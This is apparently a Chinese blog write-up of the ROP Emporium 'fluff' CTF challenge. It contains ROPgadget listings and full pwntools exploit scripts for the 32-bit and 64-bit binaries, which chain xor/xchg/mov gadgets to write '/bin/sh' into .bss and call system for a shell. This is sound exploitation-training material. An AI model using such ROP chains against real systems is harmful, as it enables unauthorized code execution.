fluff

check一下，还是只开了NX

image.png

32位：
放进ida，有system，没有binsh，思路就是吧binsh写入bss

image.png

立马找ropgadgets，果然没怎么简单，没有配对的pop和mov

大佬说题目应该这样做：
原理：因用xor进行写入操作，用一个xor操作清空寄存器A，再通过 xor A,B就可以将B寄存器的内容写入到寄存器A中去。

image.png

0x08048693 : mov dword ptr [ecx], edx ; pop ebp ; pop ebx ; xor byte ptr [ecx], bl ; ret
0x080483e1 : pop ebx ; ret
0x08048689 : xchg edx, ecx ; pop ebp ; mov edx, 0xdefaced0 ; ret
0x0804867b : xor edx, ebx ; pop ebp ; mov edi, 0xdeadbabe ; ret
0x08048671 : xor edx, edx ; pop esi ; mov ebp, 0xcafebabe ; ret

运用上面的几个gadget，首先通过自己异或，将edx清零，然后将bss写进ebx，再将ebx赋值给edx，再将edx通过xchg给ecx，然后将binsh分两段写进bss中，先写/bin，再次将edx清零，然后将bss写进ebx，再将ebx赋值给edx，再将edx通过mov写进ecx，接下来就是传bss+4与/sh\00,最后将bss传入system即可获得权限。
脚本：

#coding=utf8
from pwn import *
from LibcSearcher import *
sh = process('./fluff32')
#context.log_level = 'debug'
binsh = "/bin/sh\x00"
system = 0x08048430
bss = 0x0804A040
pop_ebx = 0x080483e1
mov_ecx_edx = 0x08048693
xchg_edx_ecx = 0x08048689
xor_edx_ebx = 0x0804867b
xor_edx_edx = 0x08048671
payload = ""
payload += 'a'*0x28 + p32(0)
payload += p32(xor_edx_edx) + p32(0)
payload += p32(pop_ebx) + p32(bss)
payload += p32(xor_edx_ebx) + p32(0)
payload += p32(xchg_edx_ecx) +p32(0)
payload += p32(xor_edx_edx) + p32(0)
payload += p32(pop_ebx) 
payload += "/bin"
payload += p32(xor_edx_ebx) + p32(0)
payload += p32(mov_ecx_edx) + p32(0) + p32(0)
payload += p32(xor_edx_edx) + p32(0)
payload += p32(pop_ebx) + p32(bss+4)
payload += p32(xor_edx_ebx) + p32(0)
payload += p32(xchg_edx_ecx) +p32(0)
payload += p32(xor_edx_edx) + p32(0)
payload += p32(pop_ebx) 
payload += "/sh\x00"
payload += p32(xor_edx_ebx) + p32(0)
payload += p32(mov_ecx_edx) + p32(0) + p32(0)
payload += p32(system) + p32(0) + p32(bss)
sh.sendline(payload)
sh.interactive（）

64位：
用指令：ROPgadget --binary fluff --only "mov|pop|ret|xor|xchg" --depth 20

ROPgadget --binary fluff --only "mov|pop|ret|xor|xchg" --depth 20
Gadgets information
============================================================
0x0000000000400713 : mov byte ptr [rip + 0x20096e], 1 ; ret
0x000000000040084f : mov dword ptr [rdx], ebx ; pop r13 ; pop r12 ; xor byte ptr [r10], r12b ; ret
0x00000000004007ae : mov eax, 0 ; pop rbp ; ret
0x0000000000400835 : mov ebp, 0x604060 ; ret
0x0000000000400846 : mov ebx, 0x602050 ; ret
0x0000000000400827 : mov edi, 0x601050 ; ret
0x000000000040083b : mov edi, 0x601050 ; xchg r11, r10 ; pop r15 ; mov r11d, 0x602050 ; ret
0x000000000040084e : mov qword ptr [r10], r11 ; pop r13 ; pop r12 ; xor byte ptr [r10], r12b ; ret
0x0000000000400845 : mov r11d, 0x602050 ; ret
0x0000000000400834 : mov r13d, 0x604060 ; ret
0x0000000000400832 : pop r12 ; mov r13d, 0x604060 ; ret
0x00000000004008bc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400853 : pop r12 ; xor byte ptr [r10], r12b ; ret
0x0000000000400851 : pop r13 ; pop r12 ; xor byte ptr [r10], r12b ; ret
0x00000000004008be : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400825 : pop r14 ; mov edi, 0x601050 ; ret
0x00000000004008c0 : pop r14 ; pop r15 ; ret
0x000000000040082d : pop r14 ; xor r11, r12 ; pop r12 ; mov r13d, 0x604060 ; ret
0x000000000040084c : pop r15 ; mov qword ptr [r10], r11 ; pop r13 ; pop r12 ; xor byte ptr [r10], r12b ; ret
0x0000000000400843 : pop r15 ; mov r11d, 0x602050 ; ret
0x00000000004008c2 : pop r15 ; ret
0x0000000000400820 : pop r15 ; xor r11, r11 ; pop r14 ; mov edi, 0x601050 ; ret
0x0000000000400712 : pop rbp ; mov byte ptr [rip + 0x20096e], 1 ; ret
0x00000000004008bb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400852 : pop rbp ; pop r12 ; xor byte ptr [r10], r12b ; ret
0x00000000004008bf : pop rbp ; pop r14 ; pop r15 ; ret
0x00000000004006b0 : pop rbp ; ret
0x00000000004008ba : pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040084d : pop rdi ; mov qword ptr [r10], r11 ; pop r13 ; pop r12 ; xor byte ptr [r10], r12b ; ret
0x0000000000400844 : pop rdi ; mov r11d, 0x602050 ; ret
0x00000000004008c3 : pop rdi ; ret
0x0000000000400821 : pop rdi ; xor r11, r11 ; pop r14 ; mov edi, 0x601050 ; ret
0x0000000000400826 : pop rsi ; mov edi, 0x601050 ; ret
0x00000000004008c1 : pop rsi ; pop r15 ; ret
0x000000000040082e : pop rsi ; xor r11, r12 ; pop r12 ; mov r13d, 0x604060 ; ret
0x0000000000400833 : pop rsp ; mov r13d, 0x604060 ; ret
0x00000000004008bd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400854 : pop rsp ; xor byte ptr [r10], r12b ; ret
0x00000000004005b9 : ret
0x0000000000400841 : xchg ebx, edx ; pop r15 ; mov r11d, 0x602050 ; ret
0x0000000000400840 : xchg r11, r10 ; pop r15 ; mov r11d, 0x602050 ; ret
0x0000000000400855 : xor byte ptr [r10], r12b ; ret
0x0000000000400856 : xor byte ptr [rdx], ah ; ret
0x0000000000400823 : xor ebx, ebx ; pop r14 ; mov edi, 0x601050 ; ret
0x0000000000400830 : xor ebx, esp ; pop r12 ; mov r13d, 0x604060 ; ret
0x0000000000400822 : xor r11, r11 ; pop r14 ; mov edi, 0x601050 ; ret
0x000000000040082f : xor r11, r12 ; pop r12 ; mov r13d, 0x604060 ; ret

Unique gadgets found: 47

脚本

#coding=utf8
from pwn import *
from LibcSearcher import *
sh = process('./fluff')
#context.log_level = 'debug'
binsh = "/bin/sh\x00"
system = 0x4005E0
bss =  0x601060
pop_rdi = 0x00000000004008c3
mov_r10_r11 = 0x000000000040084e
pop_r15 = 0x000000000040084c
xor_r11_r11 = 0x0000000000400822
xor_r11_r12 = 0x000000000040082f
xchg_r11_r10 = 0x0000000000400840
pop_r12_r13_r14_r15 = 0x00000000004008bc
payload = ""
payload += 0x20 * "A" + p64(0)
payload += p64(pop_r12_r13_r14_r15) + p64(bss) +p64(0) + p64(0) + p64(0)
payload += p64(xor_r11_r11) + p64(0)
payload += p64(xor_r11_r12) + p64(0)
payload += p64(xchg_r11_r10) + p64(0)
payload += p64(pop_r12_r13_r14_r15) + binsh +p64(0) + p64(0) + p64(0)
payload += p64(xor_r11_r11) + p64(0)
payload += p64(xor_r11_r12) + p64(0)
payload += p64(mov_r10_r11) + p64(0) + p64(0)
payload += p64(pop_rdi) + p64(bss) + p64(system)

sh.sendline(payload)
sh.interactive()

不知道为什么，我想把binsh直接用“/bin/sh\x00”传入不行

fluff

你可能感兴趣的:(fluff)